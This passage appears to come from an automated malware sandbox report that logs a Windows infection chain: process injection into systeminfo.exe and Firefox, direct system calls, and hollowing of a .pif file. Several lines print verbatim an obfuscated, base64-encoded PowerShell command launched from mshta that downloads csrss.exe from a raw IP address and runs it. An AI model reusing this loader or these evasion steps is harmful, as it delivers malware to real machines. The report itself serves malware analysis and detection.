                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBD530 mov eax, dword ptr fs:[00000030h]17_2_30CBD530
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBD530 mov eax, dword ptr fs:[00000030h]17_2_30CBD530
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90535 mov eax, dword ptr fs:[00000030h]17_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90535 mov eax, dword ptr fs:[00000030h]17_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90535 mov eax, dword ptr fs:[00000030h]17_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90535 mov eax, dword ptr fs:[00000030h]17_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90535 mov eax, dword ptr fs:[00000030h]17_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90535 mov eax, dword ptr fs:[00000030h]17_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B52F mov eax, dword ptr fs:[00000030h]17_2_30D3B52F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8D534 mov eax, dword ptr fs:[00000030h]17_2_30C8D534
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8D534 mov eax, dword ptr fs:[00000030h]17_2_30C8D534
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8D534 mov eax, dword ptr fs:[00000030h]17_2_30C8D534
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8D534 mov eax, dword ptr fs:[00000030h]17_2_30C8D534
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8D534 mov eax, dword ptr fs:[00000030h]17_2_30C8D534
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8D534 mov eax, dword ptr fs:[00000030h]17_2_30C8D534
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB16CF mov eax, dword ptr fs:[00000030h]17_2_30CB16CF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B6C0 mov eax, dword ptr fs:[00000030h]17_2_30C8B6C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B6C0 mov eax, dword ptr fs:[00000030h]17_2_30C8B6C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B6C0 mov eax, dword ptr fs:[00000030h]17_2_30C8B6C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B6C0 mov eax, dword ptr fs:[00000030h]17_2_30C8B6C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B6C0 mov eax, dword ptr fs:[00000030h]17_2_30C8B6C0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi32_2424.amsi.csv, type: OTHER
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: C:\Users\user\Links\iaoqralA.pif base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtCreateFile: Direct from: 0x77752FEC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtOpenFile: Direct from: 0x77752DCC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtSetInformationThread: Direct from: 0x77752ECC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtQueryInformationToken: Direct from: 0x77752CAC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtTerminateThread: Direct from: 0x77752FCC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtProtectVirtualMemory: Direct from: 0x77752F9C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtSetInformationProcess: Direct from: 0x77752C5C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtNotifyChangeKey: Direct from: 0x77753C2C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtOpenKeyEx: Direct from: 0x77752B9C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtOpenSection: Direct from: 0x77752E0C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtProtectVirtualMemory: Direct from: 0x77747B2E
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtQuerySystemInformation: Direct from: 0x777548CC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtAllocateVirtualMemory: Direct from: 0x77752BEC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtDeviceIoControlFile: Direct from: 0x77752AEC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtQueryInformationProcess: Direct from: 0x77752C26
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtResumeThread: Direct from: 0x77752FBCJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtReadVirtualMemory: Direct from: 0x77752E8CJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtCreateKey: Direct from: 0x77752C6C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtSetInformationThread: Direct from: 0x77752B4C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtQueryAttributesFile: Direct from: 0x77752E6C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtAllocateVirtualMemory: Direct from: 0x77753C9C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtClose: Direct from: 0x77752B6C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtCreateMutant: Direct from: 0x777535CC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtWriteVirtualMemory: Direct from: 0x77752E3CJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtMapViewOfSection: Direct from: 0x77752D1C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtResumeThread: Direct from: 0x777536AC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtReadFile: Direct from: 0x77752ADCJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtQuerySystemInformation: Direct from: 0x77752DFC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtDelayExecution: Direct from: 0x77752DDC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeNtAllocateVirtualMemory: Direct from: 0x77752BFC
                        Source: C:\Users\user\Links\iaoqralA.pifSection loaded: NULL target: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe protection: execute and read and writeJump to behavior
                        Source: C:\Users\user\Links\iaoqralA.pifSection loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe protection: read writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeThread register set: target process: 7240Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeThread APC queued: target process: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection unmapped: C:\Users\user\Links\iaoqralA.pif base address: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: C:\Users\user\Links\iaoqralA.pif base: 287008Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pifJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgmxs3luicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkrc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1ltwjlcmrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbw9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagierock8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagegpilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifisdwludcagicagicagicagicagicagicagicagicagicagicagihr1leludfb0ciagicagicagicagicagicagicagicagicagicagicagiejnavnlzhfiuuupoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjzt2giicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdrsagicagicagicagicagicagicagicagicagicagicagihhaufogicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgmxs3luojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjyumtqzlzq3mc9jc3jzcy5leguilcikrw52okfquerbvefcy3nyc3muzxhliiwwldapo1n0yvjulxnszwvqkdmpo2luvk9lrs1jdevticagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxjc3jzcy5legui'+[char]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgmxs3luicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkrc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1ltwjlcmrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbw9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagierock8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagegpilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifisdwludcagicagicagicagicagicagicagicagicagicagicagihr1leludfb0ciagicagicagicagicagicagicagicagicagicagicagiejnavnlzhfiuuupoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjzt2giicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdrsagicagicagicagicagicagicagicagicagicagicagihhaufogicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgmxs3luojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjyumtqzlzq3mc9jc3jzcy5leguilcikrw52okfquerbvefcy3nyc3muzxhliiwwldapo1n0yvjulxnszwvqkdmpo2luvk9lrs1jdevticagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxjc3jzcy5legui'+[char]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgmxs3luicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkrc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1ltwjlcmrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbw9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagierock8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagegpilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifisdwludcagicagicagicagicagicagicagicagicagicagicagihr1leludfb0ciagicagicagicagicagicagicagicagicagicagicagiejnavnlzhfiuuupoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjzt2giicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdrsagicagicagicagicagicagicagicagicagicagicagihhaufogicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgmxs3luojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjyumtqzlzq3mc9jc3jzcy5leguilcikrw52okfquerbvefcy3nyc3muzxhliiwwldapo1n0yvjulxnszwvqkdmpo2luvk9lrs1jdevticagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxjc3jzcy5legui'+[char]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgmxs3luicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkrc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1ltwjlcmrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbw9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagierock8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagegpilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifisdwludcagicagicagicagicagicagicagicagicagicagicagihr1leludfb0ciagicagicagicagicagicagicagicagicagicagicagiejnavnlzhfiuuupoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjzt2giicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdrsagicagicagicagicagicagicagicagicagicagicagihhaufogicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgmxs3luojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjyumtqzlzq3mc9jc3jzcy5leguilcikrw52okfquerbvefcy3nyc3muzxhliiwwldapo1n0yvjulxnszwvqkdmpo2luvk9lrs1jdevticagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxjc3jzcy5legui'+[char]0x22+'))')))"Jump to behavior
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
